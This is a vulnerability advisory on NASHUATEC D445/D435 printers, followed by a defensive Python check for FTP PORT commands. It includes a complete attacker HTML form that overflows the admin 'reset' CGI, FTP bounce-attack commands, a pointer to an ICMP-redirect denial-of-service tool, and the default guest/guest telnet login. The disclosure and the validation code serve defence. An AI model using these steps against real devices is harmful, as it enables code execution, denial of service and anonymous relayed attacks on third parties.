Vulnerability

NASHUATEC D445 and D435

Affected

NASHUATEC D445 printer

Description

Gregory Duchemin found the following. The NASHUATEC D445 printer is vulnerable to several attacks. Four common services run in a standard configuration: httpd, ftpd, telnetd and printer (tested with nmap). The same applies to the D435.

First, it is possible to configure the server remotely via its own administrative web server (port 80). Naturally, the server asks for an admin password before the form is submitted to the CGI. The password field is 15 characters long, but an intruder with a slightly modified copy of the original form can submit many more characters (about 260 are enough for the test) to the CGI and produce a buffer overflow (see the example below). The CGI concerned is "reset", but we can assume every CGI is exposed to this problem. If the intruder decides to forge a special password with instruction code inside, he will force the remote printer to execute that code with the privileges of the target web server.
Attacker form example:

    <HTML>
    <HEAD>
    <TITLE>Nashuadeath</TITLE>
    </HEAD>
    <!-- Gregory Duchemin Aka c3rber -->
    <!-- NEUROCOM -->
    <!-- http://www.neurocom.com -->
    <!-- 179/181 Avenue Charles de Gaulle -->
    <!-- 92200 Neuilly Sur Seine -->
    <!-- Tel: 01.41.43.84.84 Fax: 01.41.43.84.80 -->
    <BODY>
    <HR>
    <CENTER><FONT SIZE=+2><big><B>NIB 450-E</B></big></FONT></CENTER>
    <HR>
    <CENTER><FONT SIZE=+2>Unit Serial Number 599132</FONT></CENTER>
    <HR>
    <H2><CENTER>Reset Unit</CENTER></H2>
    <HR>
    <FORM ENCTYPE="application/x-www-form-urlencoded" METHOD="POST" ACTION="http://victim-printer-ip/Forms/reset">
    <B>A very big password is required to perform this function ( at least 260 chars length ).</B><BR>
    <BR>
    <INPUT TYPE="text" NAME="http_pwd" SIZE="100" MAXLENGTH="1500">
    <BR>
    <BR>
    <INPUT TYPE="SUBMIT" NAME="Submit" VALUE="T3st M3 PL3ase">
    </FORM>
    <P>
    <HR>
    <P>
    <CENTER>[ <A HREF="/index">Home</A> | <A HREF="/info">Unit Info</A> ] </CENTER>
    </BODY>
    </HTML>

Another flaw is present in the FTP daemon, which permits the infamous "bounce attack":

    ftp printer.victim.com
    user xxxxx
    pass xxxxx
    quote port a1,a2,a3,a4,0,25

where a1.a2.a3.a4 is any other IP address. The FTP server checks neither the type of port in the request (< 1024 = administrative port) nor the IP address used, so an intruder may use the service to attack other boxes anonymously.

The last one is a denial of service with an ICMP redirect storm against the printer's IP stack. Use winfreez.c to test it; the printer will not respond during the attack. winfreez.c is available at:

    http://oliver.efri.hr/~crv/security/bugs/NT/kernel48.html

Update:

- By default, a "guest" account (password guest) allows anybody to authenticate to the telnet service. That is not exactly what we should call a security hole, since anybody can connect to the web server with exactly the same privileges and without any authentication.

- The telnetd daemon no longer listens on its port after only one SYN stealth scan (try the nmap "-sS" option).
This behavior suggests that this version of telnetd is unable to manage simultaneous connection requests, resulting in a possible denial of service attack.

Solution

Nothing yet.
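Server-side validation of the FTP PORT argument, added here as an example and not taken from the advisory or the printer's firmware: it rejects the two requests the advisory says the printer's ftpd accepts, a data-connection address other than the control connection's peer, and a privileged destination port. Function names and the 192.0.2.x addresses are constructed for illustration.

```python
import ipaddress

# Constructed example, not code from the advisory or the printer firmware:
# server-side validation of an FTP PORT argument. The client asks the server
# to open a data connection to h1.h2.h3.h4 on port p1*256+p2; a server that
# accepts any address or port can be used as a relay (the "bounce attack").

PRIVILEGED_PORT_MAX = 1023  # ports below 1024 are administrative services


def parse_port_argument(arg: str) -> tuple[str, int]:
    """Parse 'h1,h2,h3,h4,p1,p2' into (ip, port); raise ValueError if malformed."""
    fields = arg.strip().split(",")
    if len(fields) != 6:
        raise ValueError("PORT needs six comma-separated values")
    try:
        values = [int(f) for f in fields]
    except ValueError:
        raise ValueError("PORT fields must be decimal integers") from None
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError("PORT fields must be in 0..255")
    ip = ".".join(str(v) for v in values[:4])
    port = values[4] * 256 + values[5]
    return ip, port


def validate_port_command(arg: str, control_peer_ip: str) -> tuple[bool, str]:
    """Return (accepted, reply) for a PORT command received on a control
    connection whose peer address is control_peer_ip. The two rejections are
    the checks the advisory says the printer's ftpd does not make."""
    try:
        ip, port = parse_port_argument(arg)
    except ValueError as exc:
        return False, f"501 Syntax error in parameters: {exc}"
    # The data connection may only go back to the client that asked for it.
    if ipaddress.ip_address(ip) != ipaddress.ip_address(control_peer_ip):
        return False, "500 Illegal PORT command: address differs from control connection"
    # Never let a client point the server at an administrative port.
    if port <= PRIVILEGED_PORT_MAX:
        return False, "500 Illegal PORT command: privileged port refused"
    return True, "200 PORT command successful"


if __name__ == "__main__":
    # 192.0.2.0/24 is documentation address space; all values are constructed.
    for arg in ("192,0,2,7,4,1", "192,0,2,7,0,25", "192,0,2,10,4,1", "192,0,2,7,0"):
        print(arg, "->", validate_port_command(arg, "192.0.2.7")[1])
```

These are the checks RFC 2577 (FTP Security Considerations) recommends against bounce attacks; the same applies to any device-embedded FTP daemon, not only this printer.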